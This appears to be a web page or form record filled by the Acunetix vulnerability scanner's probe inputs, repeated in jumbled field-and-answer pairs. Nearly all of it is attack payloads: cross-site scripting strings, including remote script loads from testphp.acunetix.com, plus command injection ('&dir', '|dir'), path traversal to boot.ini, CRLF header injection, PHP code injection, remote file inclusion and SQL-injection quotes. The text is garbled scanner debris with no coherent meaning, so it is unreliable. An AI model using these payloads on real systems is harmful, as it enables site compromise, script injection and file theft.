B9: </xss/*-*/style=xss:e/**/xpression(alert(417198122565))>
answers: V4
B9: ;acunetix:expr/**/ession(alert(417218122565));
answers: V4
B9: <iframe/ /onload=alert(417228122914)></iframe>
answers: V5
B9: acuaf05e09ff78c413250f064743333506a
answers: V5
B9: <script>alert(417248123591)</script>
answers: V5
B9: <ScRiPt
>alert(417258123591);</ScRiPt>
answers: V5
B9: >"><ScRiPt
>alert(417278123591);</ScRiPt>
answers: V5
B9: >'><ScRiPt
>alert(417268123591);</ScRiPt>
answers: V5
B9: </textarea><ScRiPt
>alert(417288123591);</ScRiPt>
answers: V5
B9: </title><ScRiPt
>alert(417298123591);</ScRiPt>
answers: V5
B9: --><ScRiPt
>alert(417308123591);</ScRiPt>
answers: V5
B9: email@some<ScRiPt
>alert(417318123591);</ScRiPt>domain.com
answers: V5
B9: <img src="JaVaScRiPt:alert(417338123591);">
answers: V5
B9: [img]JaVaScRiPt:alert(417328123591)[/img]
answers: V5
B9: <script>alert(417348124115);</script>
answers: V5
B9: <scrip<script>t>alert(417358124115);</scrip</script>t>
answers: V5
B9: <DIV STYLE="width:expression(alert(417368124117));">
answers: V5
B9: <FRAMESET><FRAME SRC="JaVaScRiPt:alert(417378124117);"></FRAMESET>
answers: V5
B9: <img dynsrc="JaVaScRiPt:alert(417388124117);">
answers: V5
B9: <iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=" invalid="417408124117">
answers: V5
B9: <ScRiPt src=http://testphp.acunetix.com/xss.js?417438124117></ScRiPt>
answers: V5
B9: <body onload=alert(417428124117)>
answers: V5
B9: <META HTTP-EQUIV="refresh" CONTENT="0;url=JaVaScRiPt:alert(417398124117);">
answers: V5
B9: <embed src="http://testphp.acunetix.com/xss.swf?417418124117" type="application/x-shockwave-flash"/>
answers: V5
B9: <script/xss src=http://testphp.acunetix.com/xss.js?417448124473></script>
answers: V5
B9: <img src=http://testphp.acunetix.com/dot.gif onload=alert(417458124473)>
answers: V5
B9: <ScRiPt bad=">" src="http://testphp.acunetix.com/xss.js?417488124473"></ScRiPt>
answers: V5
B9: %3CScRiPt%3Ealert(417478124473);%3C/ScRiPt%3E
answers: V5
B9: ' style='background:url(JaVaScRiPt:alert(417468124473))' invalidparam='
answers: V5
B9: <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html;charset=UTF-7"></HEAD>+ADw-ScRiPt+AD4-alert(417518124473)+ADsAPA-/ScRiPt+AD4-
answers: V5
B9: " onmouseover=alert(417498124473)
answers: V5
B9: '"><ScRiPt
>alert(417528124473);</ScRiPt>
answers: V5
B9: </div><ScRiPt
>alert(417508124473);</ScRiPt>
answers: V5
B9: "'><ScRiPt
>alert(417538124473);</ScRiPt>
answers: V5
B9: PFNjUmlQdD5hbGVydCgneHNzLXRlc3QnKTs8L1NjUmlQdD4=
answers: V5
B9: Pic PFNjUmlQdD5hbGVydCgneHNzLXRlc3QnKTs8L1NjUmlQdD4=
answers: V5
B9: PiI PFNjUmlQdD5hbGVydCgneHNzLXRlc3QnKTs8L1NjUmlQdD4=
answers: V5
B9: IiBvbm1vdXNlb3Zlcj0iYWxlcnQoJ3hzcy10ZXN0Jyk=
answers: V5
B9: </xss/*-*/style=xss:e/**/xpression(alert(417618124887))>
answers: V5
B9: javascript:alert(417628124887)
answers: V5
B9: ACUstart417588124887'";ACUend
answers: V5
B9: ;acunetix:expr/**/ession(alert(417638124887));
answers: V5
B9: %uff1e%uff02%uff1exxx%uff1cscript%uff1ealert(417598124887);%uff1c/script%uff1e
answers: V5
B9: %uff1e%uff07%uff1exxx%uff1cscript%uff1ealert(417608124887);%uff1c/script%uff1e
answers: V5
B9: <iframe/ /onload=alert(417648126184)></iframe>
answers: &dir&
B9: Submit
answers: ;dir
B9: Submit
answers: dir
B9: Submit
answers: |dir
B9: Submit
answers: dir
B9: Submit
answers: <dir
B9: Submit
answers: &dir
B9: Submit
answers: almost positive
B9: &dir
answers: almost positive
B9: |dir
answers: almost positive
B9: &dir&
answers: almost positive
B9: ;dir
answers: almost positive
B9: dir
answers: V2
B9: &dir&
answers: V2
B9: |dir
answers: almost positive
B9: dir
answers: almost positive
B9: <dir
answers: V2
B9: ;dir
answers: V2
B9: &dir
answers: V2
B9: dir
answers: V3
B9: ;dir
answers: V3
B9: |dir
answers: V3
B9: &dir
answers: V2
B9: dir
answers: V3
B9: dir
answers: V2
B9: <dir
answers: V3
B9: &dir&
answers: V3
B9: dir
answers: V3
B9: <dir
answers: V4
B9: |dir
answers: V4
B9: &dir&
answers: V5
B9: |dir
answers: V4
B9: &dir
answers: V4
B9: dir
answers: V4
B9: <dir
answers: V4
B9: ;dir
answers: V4
B9: dir
answers: V5
B9: &dir&
answers: V5
B9: &dir
answers: V5
B9: dir
answers: V5
B9: ;dir
answers: V5
B9: dir
answers: V5
B9: <dir
answers: ../../../../../../../../boot.ini
B9: Submit
answers: ../../../../../../../../boot.ini
B9: Submit
answers: ../../../../../../../../boot.ini.jpg
B9: Submit
answers: /.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
B9: Submit
answers: C:\boot.ini
B9: Submit
answers: À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯boot.ini
B9: Submit
answers: ../../../../../../../../boot.ini.html
B9: Submit
answers: ..\..\..\..\..\..\..\..\boot.ini
B9: Submit
answers: /./././././././boot.ini
B9: Submit
answers: ../..//../..//../..//../..//../..//../..//../..//../..//boot.ini
B9: Submit
answers: almost positive
B9: ../../../../../../../../boot.ini
answers: almost positive
B9: À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯boot.ini
answers: almost positive
B9: /./././././././boot.ini
answers: almost positive
B9: /.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
answers: almost positive
B9: ../../../../../../../../boot.ini.jpg
answers: almost positive
B9: C:\boot.ini
answers: almost positive
B9: ../../../../../../../../boot.ini.html
answers: almost positive
B9: ../../../../../../../../boot.ini
answers: almost positive
B9: ../..//../..//../..//../..//../..//../..//../..//../..//boot.ini
answers: almost positive
B9: ..\..\..\..\..\..\..\..\boot.ini
answers: ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././boot.ini
B9: Submit
answers: <..\..\..\..\..\..\..\..\boot.ini
B9: Submit
answers: |..\..\..\..\..\..\..\..\boot.ini
B9: Submit
answers: ..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯boot.ini
B9: Submit
answers: almost positive
B9: |..\..\..\..\..\..\..\..\boot.ini
answers: almost positive
B9: ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././boot.ini
answers: almost positive
B9: <..\..\..\..\..\..\..\..\boot.ini
answers: almost positive
B9: ..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯boot.ini
answers: V2
B9: ../../../../../../../../boot.ini
answers: V2
B9: À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯boot.ini
answers: V2
B9: ../../../../../../../../boot.ini.html
answers: V2
B9: ../../../../../../../../boot.ini.jpg
answers: V2
B9: ../../../../../../../../boot.ini
answers: V2
B9: /.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
answers: V2
B9: C:\boot.ini
answers: V2
B9: ..\..\..\..\..\..\..\..\boot.ini
answers: V2
B9: /./././././././boot.ini
answers: V2
B9: ../..//../..//../..//../..//../..//../..//../..//../..//boot.ini
answers: V2
B9: <..\..\..\..\..\..\..\..\boot.ini
answers: V2
B9: |..\..\..\..\..\..\..\..\boot.ini
answers: V3
B9: ../../../../../../../../boot.ini
answers: V3
B9: ../../../../../../../../boot.ini
answers: V2
B9: ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././boot.ini
answers: V2
B9: ..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯boot.ini
answers: V3
B9: ../../../../../../../../boot.ini.html
answers: V3
B9: ../../../../../../../../boot.ini.jpg
answers: V3
B9: /.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
answers: V3
B9: C:\boot.ini
answers: V3
B9: À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯boot.ini
answers: V3
B9: ../..//../..//../..//../..//../..//../..//../..//../..//boot.ini
answers: V3
B9: ..\..\..\..\..\..\..\..\boot.ini
answers: V3
B9: /./././././././boot.ini
answers: V3
B9: ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././boot.ini
answers: V3
B9: <..\..\..\..\..\..\..\..\boot.ini
answers: V3
B9: ..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯boot.ini
answers: V3
B9: |..\..\..\..\..\..\..\..\boot.ini
answers: V4
B9: ../../../../../../../../boot.ini
answers: V4
B9: ../../../../../../../../boot.ini
answers: V4
B9: /.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
answers: V4
B9: ../../../../../../../../boot.ini.jpg
answers: V4
B9: /./././././././boot.ini
answers: V4
B9: ../../../../../../../../boot.ini.html
answers: V4
B9: À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯boot.ini
answers: V4
B9: C:\boot.ini
answers: V4
B9: ..\..\..\..\..\..\..\..\boot.ini
answers: V4
B9: ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././boot.ini
answers: V4
B9: ../..//../..//../..//../..//../..//../..//../..//../..//boot.ini
answers: V4
B9: <..\..\..\..\..\..\..\..\boot.ini
answers: V5
B9: ../../../../../../../../boot.ini
answers: V5
B9: ../../../../../../../../boot.ini.html
answers: V5
B9: À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯boot.ini
answers: V5
B9: ../../../../../../../../boot.ini
answers: V4
B9: |..\..\..\..\..\..\..\..\boot.ini
answers: V4
B9: ..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯boot.ini
answers: V5
B9: ../../../../../../../../boot.ini.jpg
answers: V5
B9: /./././././././boot.ini
answers: V5
B9: ..\..\..\..\..\..\..\..\boot.ini
answers: V5
B9: C:\boot.ini
answers: V5
B9: /.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
answers: V5
B9: ../..//../..//../..//../..//../..//../..//../..//../..//boot.ini
answers: V5
B9: ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././boot.ini
answers: V5
B9: |..\..\..\..\..\..\..\..\boot.ini
answers: V5
B9: ..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯boot.ini
answers: V5
B9: <..\..\..\..\..\..\..\..\boot.ini
answers: almost positive
B9: acunetix_wvs_invalid_filename
answers: acunetix_wvs_invalid_filename
B9: Submit
answers: almost positive
B9: dark_ages.htm.html
answers: almost positive
B9: dark_ages.htm
answers: dark_ages.htm.jpg
B9: Submit
answers: almost positive
B9: dark_ages.htm.jpg
answers: dark_ages.htm
B9: Submit
answers: dark_ages.htm.html
B9: Submit
answers: V2
B9: acunetix_wvs_invalid_filename
answers: V2
B9: dark_ages.htm
answers: V2
B9: dark_ages.htm.jpg
answers: V2
B9: dark_ages.htm.html
answers: V3
B9: acunetix_wvs_invalid_filename
answers: V3
B9: dark_ages.htm
answers: V3
B9: dark_ages.htm.html
answers: V3
B9: dark_ages.htm.jpg
answers: V4
B9: acunetix_wvs_invalid_filename
answers: V4
B9: dark_ages.htm
answers: V4
B9: dark_ages.htm.html
answers: V4
B9: dark_ages.htm.jpg
answers: V5
B9: acunetix_wvs_invalid_filename
answers: V5
B9: dark_ages.htm
answers: V5
B9: dark_ages.htm.html
answers: V5
B9: dark_ages.htm.jpg
answers: http://www.acunetix-long-name-with-some-inexistent-host.com/
B9: Submit
answers: almost positive
B9: http://www.acunetix-long-name-with-some-inexistent-host.com/
answers: V3
B9: http://www.acunetix-long-name-with-some-inexistent-host.com/
answers: V2
B9: http://www.acunetix-long-name-with-some-inexistent-host.com/
answers: V5
B9: http://www.acunetix-long-name-with-some-inexistent-host.com/
answers: V4
B9: http://www.acunetix-long-name-with-some-inexistent-host.com/
answers: almost positive
B9: '"
answers: almost positive
B9: /
answers: /
B9: Submit
answers: '"
B9: Submit
answers: V2
B9: /
answers: V2
B9: '"
answers: V4
B9: '"
answers: V3
B9: /
answers: V3
B9: '"
answers: V5
B9: '"
answers: V4
B9: /
answers: V5
B9: /
answers: )
B9: Submit
answers: !(()
B9: Submit
answers: V2
B9: )
answers: almost positive
B9: )
answers: V2
B9: !(()
answers: V4
B9: !(()
answers: V3
B9: )
answers: V3
B9: !(()
answers: almost positive
B9: !(()
answers: V4
B9: )
answers: V5
B9: )
answers: V5
B9: !(()
answers: <meta http-equiv='Set-cookie' content='cookiename=cookievalue'>
B9: Submit
answers: V2
B9: <meta http-equiv='Set-cookie' content='cookiename=cookievalue'>
answers: almost positive
B9: <meta http-equiv='Set-cookie' content='cookiename=cookievalue'>
answers:
Set-Cookie: cookiename=cookievalue
B9: Submit
answers: almost positive
B9:
Set-Cookie: cookiename=cookievalue
answers: V3
B9:
Set-Cookie: cookiename=cookievalue
answers: V4
B9: <meta http-equiv='Set-cookie' content='cookiename=cookievalue'>
answers: V2
B9:
Set-Cookie: cookiename=cookievalue
answers: V3
B9: <meta http-equiv='Set-cookie' content='cookiename=cookievalue'>
answers: V4
B9:
Set-Cookie: cookiename=cookievalue
answers: V5
B9: <meta http-equiv='Set-cookie' content='cookiename=cookievalue'>
answers: V5
B9:
Set-Cookie: cookiename=cookievalue
answers: http://www.acunetix.com
B9: Submit
answers: almost positive
B9: http://www.acunetix.com
answers: V4
B9: http://www.acunetix.com
answers: V5
B9: http://www.acunetix.com
answers: V3
B9: http://www.acunetix.com
answers: V2
B9: http://www.acunetix.com
answers: almost positive
B9: Submit
answers:
B9: Submit
answers: 268435455
B9: Submit
answers: NULL
B9: Submit
answers: 0
B9: Submit
answers: \'\");|]*{
<
B9: Submit
answers: -268435455
B9: Submit
answers: 0x3fffffff
B9: Submit
answers: almost positive
B9:
answers: 0xffffffff
B9: Submit
answers: 0x7fffffff
B9: Submit
answers: 0x80000000
B9: Submit
answers: almost positive
B9: 268435455
answers: almost positive
B9: -268435455
answers: almost positive
B9: NULL
answers: almost positive
B9: 0
answers: almost positive
B9: \'\");|]*{
<
answers: almost positive
B9: 0x80000000
answers: almost positive
B9: 0x7fffffff
answers: almost positive
B9: 0x3fffffff
answers: almost positive
B9: 0xffffffff
answers: V2
B9: Submit
answers: 65536
B9: Submit
answers: -1.0
B9: Submit
answers: almost positive
B9: -1.0
answers: almost positive
B9: 65536
answers: V2
B9: \'\");|]*{
<
answers: V2
B9:
answers: V2
B9: -268435455
answers: V2
B9: 268435455
answers: V2
B9: 0
answers: V2
B9: NULL
answers: V2
B9: 0x80000000
answers: V2
B9: 0x3fffffff
answers: V3
B9: Submit
answers: V2
B9: 65536
answers: V2
B9: -1.0
answers: V3
B9:
answers: V3
B9: 268435455
answers: V2
B9: 0xffffffff
answers: V2
B9: 0x7fffffff
answers: V3
B9: 0
answers: V3
B9: NULL
answers: V3
B9: \'\");|]*{
<
answers: V3
B9: -268435455
answers: V3
B9: 0x3fffffff
answers: V3
B9: -1.0
answers: V3
B9: 0x80000000
answers: V3
B9: 0xffffffff
answers: V3
B9: 65536
answers: V4
B9:
answers: V3
B9: 0x7fffffff
answers: V4
B9: 268435455
answers: V4
B9: \'\");|]*{
<
answers: V4
B9: -268435455
answers: V4
B9: Submit
answers: V4
B9: 0
answers: V4
B9: NULL
answers: V4
B9: 0x3fffffff
answers: V4
B9: 0x80000000
answers: V4
B9: -1.0
answers: V4
B9: 0x7fffffff
answers: V4
B9: 0xffffffff
answers: V5
B9:
answers: V4
B9: 65536
answers: V5
B9: 268435455
answers: V5
B9: Submit
answers: V5
B9: -268435455
answers: V5
B9: 0
answers: V5
B9: 0x3fffffff
answers: V5
B9: \'\");|]*{
<
answers: V5
B9: NULL
answers: V5
B9: 0x80000000
answers: V5
B9: -1.0
answers: V5
B9: 0x7fffffff
answers: V5
B9: 65536
answers: V5
B9: 0xffffffff
answers: http://testphp.acunetix.com/acunetix_file_inclusion_test?
B9: Submit
answers: http://some-inexistent-website.com/some_inexistent_file_with_long_name
B9: Submit
answers: almost positive
B9: /some_inexistent_file_with_long_name
answers: almost positive
B9: http://some-inexistent-website.com/some_inexistent_file_with_long_name
answers: almost positive
B9: http://testphp.acunetix.com/acunetix_file_inclusion_test?
answers: V2
B9: /some_inexistent_file_with_long_name
answers: /some_inexistent_file_with_long_name
B9: Submit
answers: V2
B9: http://some-inexistent-website.com/some_inexistent_file_with_long_name
answers: V3
B9: http://testphp.acunetix.com/acunetix_file_inclusion_test?
answers: V2
B9: http://testphp.acunetix.com/acunetix_file_inclusion_test?
answers: V3
B9: /some_inexistent_file_with_long_name
answers: V4
B9: http://some-inexistent-website.com/some_inexistent_file_with_long_name
answers: V3
B9: http://some-inexistent-website.com/some_inexistent_file_with_long_name
answers: V4
B9: /some_inexistent_file_with_long_name
answers: V4
B9: http://testphp.acunetix.com/acunetix_file_inclusion_test?
answers: V5
B9: http://testphp.acunetix.com/acunetix_file_inclusion_test?
answers: V5
B9: /some_inexistent_file_with_long_name
answers: V5
B9: http://some-inexistent-website.com/some_inexistent_file_with_long_name
answers:
SomeCustomInjectedHeader:injected_by_wvs
B9: Submit
answers: almost positive
B9:
SomeCustomInjectedHeader:injected_by_wvs
answers: V2
B9:
SomeCustomInjectedHeader:injected_by_wvs
answers: V2
B9:
SomeCustomInjectedHeader:injected_by_wvs
answers:
SomeCustomInjectedHeader:injected_by_wvs
B9: Submit
answers: almost positive
B9:
SomeCustomInjectedHeader:injected_by_wvs
answers: V3
B9:
SomeCustomInjectedHeader:injected_by_wvs
answers: V3
B9:
SomeCustomInjectedHeader:injected_by_wvs
answers: V4
B9:
SomeCustomInjectedHeader:injected_by_wvs
answers: V5
B9:
SomeCustomInjectedHeader:injected_by_wvs
answers: V4
B9:
SomeCustomInjectedHeader:injected_by_wvs
answers: V5
B9:
SomeCustomInjectedHeader:injected_by_wvs
answers: printf(md5(acunetix_wvs_security_test));exit;//
B9: Submit
answers: ;printf(md5(acunetix_wvs_security_test));exit;//
B9: Submit
answers: almost positive
B9: ";printf(md5(acunetix_wvs_security_test));exit;//
answers: ';printf(md5(acunetix_wvs_security_test));exit;//
B9: Submit
answers: almost positive
B9: ;printf(md5(acunetix_wvs_security_test));exit;//
answers: almost positive
B9: ';printf(md5(acunetix_wvs_security_test));exit;//
answers: almost positive
B9: printf(md5(acunetix_wvs_security_test));exit;//
answers: V2
B9: printf(md5(acunetix_wvs_security_test));exit;//
answers: ";printf(md5(acunetix_wvs_security_test));exit;//
B9: Submit
answers: V3
B9: printf(md5(acunetix_wvs_security_test));exit;//
answers: V2
B9: ";printf(md5(acunetix_wvs_security_test));exit;//
answers: V2
B9: ;printf(md5(acunetix_wvs_security_test));exit;//
answers: V2
B9: ';printf(md5(acunetix_wvs_security_test));exit;//
answers: V3
B9: ;printf(md5(acunetix_wvs_security_test));exit;//
answers: V3
B9: ";printf(md5(acunetix_wvs_security_test));exit;//
answers: V4
B9: printf(md5(acunetix_wvs_security_test));exit;//
answers: V3
B9: ';printf(md5(acunetix_wvs_security_test));exit;//
answers: V4
B9: ';printf(md5(acunetix_wvs_security_test));exit;//
answers: V4
B9: ";printf(md5(acunetix_wvs_security_test));exit;//
answers: V5
B9: ';printf(md5(acunetix_wvs_security_test));exit;//
answers: V5
B9: printf(md5(acunetix_wvs_security_test));exit;//
answers: V4
B9: ;printf(md5(acunetix_wvs_security_test));exit;//
answers: V5
B9: ";printf(md5(acunetix_wvs_security_test));exit;//
answers: V5
B9: ;printf(md5(acunetix_wvs_security_test));exit;//
answers: almost positive
B9: http://testphp.acunetix.com/acunetix_xsl_inclusion_test.xsl
answers: http://testphp.acunetix.com/acunetix_xsl_inclusion_test.xsl
B9: Submit
answers: V2
B9: http://testphp.acunetix.com/acunetix_xsl_inclusion_test.xsl
answers: V3
B9: http://testphp.acunetix.com/acunetix_xsl_inclusion_test.xsl
answers: V4
B9: http://testphp.acunetix.com/acunetix_xsl_inclusion_test.xsl
answers: V5
B9: http://testphp.acunetix.com/acunetix_xsl_inclusion_test.xsl
answers: almost positive
B9: Submit
answers: %27
B9: Submit
answers: '
B9: Submit
answers: acunetix'"
B9: Submit
answers: \'
B9: Submit
answers: JyI=
B9: Submit
answers: \"
B9: Submit
answers: almost positive
B9: acunetix'"
answers: almost positive
B9: '
answers: almost positive
B9: '
answers: '
B9: Submit
answers: almost positive
B9: \"
answers: almost positive
B9: %27
answers: almost positive
B9: \'
answers: V2
B9: '
answers: almost positive
B9: JyI=
answers: V2
B9: '
answers: V2
B9: %27
answers: V2
B9: acunetix'"
answers: V2
B9: \'
answers: V2
B9: JyI=
answers: V2
B9: \"
answers: V3
B9: \'
answers: V3
B9: '
answers: V3
B9: \"
answers: V3
B9: %27
answers: V3
B9: acunetix'"
answers: V3
B9: '
answers: V4
B9: '
answers: V3
B9: JyI=
answers: V4
B9: %27
answers: V5
B9: '
answers: V5
B9: %27
answers: V4
B9: \"
answers: V4
B9: '
answers: V4
B9: acunetix'"
answers: V4
B9: \'
answers: V4
B9: JyI=
answers: V5
B9: '
answers: V5
B9: acunetix'"
answers: V5
B9: \"
answers: V5
B9: \'
answers: V5
B9: JyI=
answers: almost positive
B9: acub03d2efc1c8bdb0154f8aef6f83866e5
answers: acu1131d56b56b5f6c2e9335a223ba0d128
B9: Submit
answers: almost positive
B9: <ScRiPt
>alert(415078359482);</ScRiPt>
answers: almost positive
B9: <script>alert(415068359482)</script>
answers: almost positive
B9: >"><ScRiPt
>alert(415098359482);</ScRiPt>
answers: almost positive
B9: </title><ScRiPt
>alert(415118359482);</ScRiPt>
answers: almost positive
B9: </textarea><ScRiPt
>alert(415108359482);</ScRiPt>
answers: almost positive
B9: >'><ScRiPt
>alert(415088359482);</ScRiPt>
answers: almost positive
B9: --><ScRiPt
>alert(415128359482);</ScRiPt>
answers: almost positive
B9: email@some<ScRiPt
>alert(415138359482);</ScRiPt>domain.com
answers: almost positive
B9: <img src="JaVaScRiPt:alert(415158359482);">
answers: >"><ScRiPt
>alert(415198359492);</ScRiPt>
B9: Submit
answers: <script>alert(415168359492)</script>
B9: Submit
answers: <ScRiPt
>alert(415178359492);</ScRiPt>
B9: Submit
answers: >'><ScRiPt
>alert(415188359492);</ScRiPt>
B9: Submit
answers: almost positive
B9: [img]JaVaScRiPt:alert(415148359482)[/img]
answers: --><ScRiPt
>alert(415228359492);</ScRiPt>
B9: Submit
answers: [img]JaVaScRiPt:alert(415248359492)[/img]
B9: Submit
answers: email@some<ScRiPt
>alert(415238359492);</ScRiPt>domain.com
B9: Submit
answers: </textarea><ScRiPt
>alert(415208359492);</ScRiPt>
B9: Submit
answers: </title><ScRiPt
>alert(415218359492);</ScRiPt>
B9: Submit
answers: <img src="JaVaScRiPt:alert(415258359492);">
B9: Submit
answers: almost positive
B9: <script>alert(415278359872);</script>
answers: almost positive
B9: <scrip<script>t>alert(415288359872);</scrip</script>t>
answers: almost positive
B9: <FRAMESET><FRAME SRC="JaVaScRiPt:alert(415308359872);"></FRAMESET>
answers: almost positive
B9: <DIV STYLE="width:expression(alert(415298359872));">
answers: almost positive
B9: <body onload=alert(415358359872)>
answers: almost positive
B9: <ScRiPt src=http://testphp.acunetix.com/xss.js?415368359872></ScRiPt>
answers: almost positive
B9: <embed src="http://testphp.acunetix.com/xss.swf?415348359872" type="application/x-shockwave-flash"/>
answers: <script>alert(415378359932);</script>
B9: Submit
answers: almost positive
B9: <META HTTP-EQUIV="refresh" CONTENT="0;url=JaVaScRiPt:alert(415328359872);">
answers: almost positive
B9: <iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=" invalid="415338359872">
answers: <FRAMESET><FRAME SRC="JaVaScRiPt:alert(415408359932);"></FRAMESET>
B9: Submit
answers: <img dynsrc="JaVaScRiPt:alert(415418359932);">
B9: Submit
answers: <scrip<script>t>alert(415388359932);</scrip</script>t>
B9: Submit
answers: <META HTTP-EQUIV="refresh" CONTENT="0;url=JaVaScRiPt:alert(415428359932);">
B9: Submit
answers: <DIV STYLE="width:expression(alert(415398359932));">
B9: Submit
answers: <iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=" invalid="415438359932">
B9: Submit
answers: almost positive
B9: <img dynsrc="JaVaScRiPt:alert(415318359872);">
answers: <embed src="http://testphp.acunetix.com/xss.swf?415448359932" type="application/x-shockwave-flash"/>
B9: Submit
answers: <ScRiPt src=http://testphp.acunetix.com/xss.js?415468359932></ScRiPt>
B9: Submit
answers: |